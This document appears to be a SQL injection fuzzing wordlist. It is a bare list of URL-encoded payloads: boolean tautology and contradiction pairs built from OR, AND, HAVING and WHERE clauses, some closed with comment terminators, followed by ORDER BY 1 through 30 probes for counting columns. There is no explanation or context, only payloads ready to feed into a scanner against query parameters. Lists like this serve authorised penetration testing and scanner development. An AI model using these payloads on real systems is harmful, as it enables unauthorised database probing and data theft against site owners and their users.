%20OR%201=1
%20OR%201=0
%20OR%20x=x
%20OR%20x=y
%20OR%201=1#
%20OR%201=0#
%20OR%20x=x#
%20OR%20x=y#
%20OR%201=1--%20
%20OR%201=0--%20
%20OR%20x=x--%20
%20OR%20x=y--%20
%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytW
%20OR%203409=3409%20AND%20('pytW'%20LIKE%20'pytY
%20HAVING%201=1
%20HAVING%201=0
%20HAVING%201=1#
%20HAVING%201=0#
%20HAVING%201=1--%20
%20HAVING%201=0--%20
%20AND%201=1
%20AND%201=0
%20AND%201=1--%20
%20AND%201=0--%20
%20AND%201=1#
%20AND%201=0#
%20AND%201=1%20AND%20'%'='
%20AND%201=0%20AND%20'%'='
%20AND%201083=1083%20AND%20(1427=1427
%20AND%207506=9091%20AND%20(5913=5913
%20AND%201083=1083%20AND%20('1427=1427
%20AND%207506=9091%20AND%20('5913=5913
%20AND%207300=7300%20AND%20'pKlZ'='pKlZ
%20AND%207300=7300%20AND%20'pKlZ'='pKlY
%20AND%207300=7300%20AND%20('pKlZ'='pKlZ
%20AND%207300=7300%20AND%20('pKlZ'='pKlY
%20AS%20INJECTX%20WHERE%201=1%20AND%201=1
%20AS%20INJECTX%20WHERE%201=1%20AND%201=0
%20AS%20INJECTX%20WHERE%201=1%20AND%201=1#
%20AS%20INJECTX%20WHERE%201=1%20AND%201=0#
%20AS%20INJECTX%20WHERE%201=1%20AND%201=1--
%20AS%20INJECTX%20WHERE%201=1%20AND%201=0--
%20WHERE%201=1%20AND%201=1
%20WHERE%201=1%20AND%201=0
%20WHERE%201=1%20AND%201=1#
%20WHERE%201=1%20AND%201=0#
%20WHERE%201=1%20AND%201=1--
%20WHERE%201=1%20AND%201=0--
%20ORDER%20BY%201--%20
%20ORDER%20BY%202--%20
%20ORDER%20BY%203--%20
%20ORDER%20BY%204--%20
%20ORDER%20BY%205--%20
%20ORDER%20BY%206--%20
%20ORDER%20BY%207--%20
%20ORDER%20BY%208--%20
%20ORDER%20BY%209--%20
%20ORDER%20BY%2010--%20
%20ORDER%20BY%2011--%20
%20ORDER%20BY%2012--%20
%20ORDER%20BY%2013--%20
%20ORDER%20BY%2014--%20
%20ORDER%20BY%2015--%20
%20ORDER%20BY%2016--%20
%20ORDER%20BY%2017--%20
%20ORDER%20BY%2018--%20
%20ORDER%20BY%2019--%20
%20ORDER%20BY%2020--%20
%20ORDER%20BY%2021--%20
%20ORDER%20BY%2022--%20
%20ORDER%20BY%2023--%20
%20ORDER%20BY%2024--%20
%20ORDER%20BY%2025--%20
%20ORDER%20BY%2026--%20
%20ORDER%20BY%2027--%20
%20ORDER%20BY%2028--%20
%20ORDER%20BY%2029--%20
%20ORDER%20BY%2030--%20
